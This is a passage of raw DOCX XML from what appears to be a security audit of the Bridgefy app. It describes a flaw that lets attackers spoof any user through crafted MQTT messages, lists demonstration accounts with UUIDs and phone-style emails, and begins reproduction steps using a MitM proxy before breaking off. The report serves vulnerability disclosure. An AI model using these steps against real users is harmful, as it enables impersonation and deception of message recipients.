        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>impersonate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>arbitrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy users on both the Android and iOS applications. Malicious attackers could abuse this weakness to publish specially crafted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>spoof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>note that the attacker must know the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>UUID </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>spoofed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>however</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>already</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be known when such user is already a contact, or obtained through a separate leak, or a vulnerability like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. This issue was confirmed using the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="20"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>demonstration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>purposes:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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300"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2560"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="118"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="118"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>displayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2560" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="118"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>UUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="118"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="640" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="114"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="114"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>oscaraa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2560" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="114"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>e16ee31e-9aea-44c2-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>abdb</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>57d1f3473b01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="114"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId42">
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Consolas"/>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>+12012987481@bridgefy.app</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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300"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2560"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="619" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="99"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="99"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Oscar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2560" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="99"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>e965dd5f-8df8-4478-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>b51c</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>f3ac82fac134</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="99"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId38">
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Consolas"/>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>+12064512559@bridgefy.app</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="620" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:ind w:left="94" w:right="487"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spoofed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>userand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2560" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>58ac0b67-bb4f-459e-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9b82</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="104"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4b67c81abf3c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId43">
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Consolas"/>
                  <w:spacing w:val="-2"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>+12066561175@bridgefy.app</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1440" w:right="1183" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>(+12012987481@bridgefy.app)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the attacker device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Intercept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Request/Response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MitM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(i.e.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
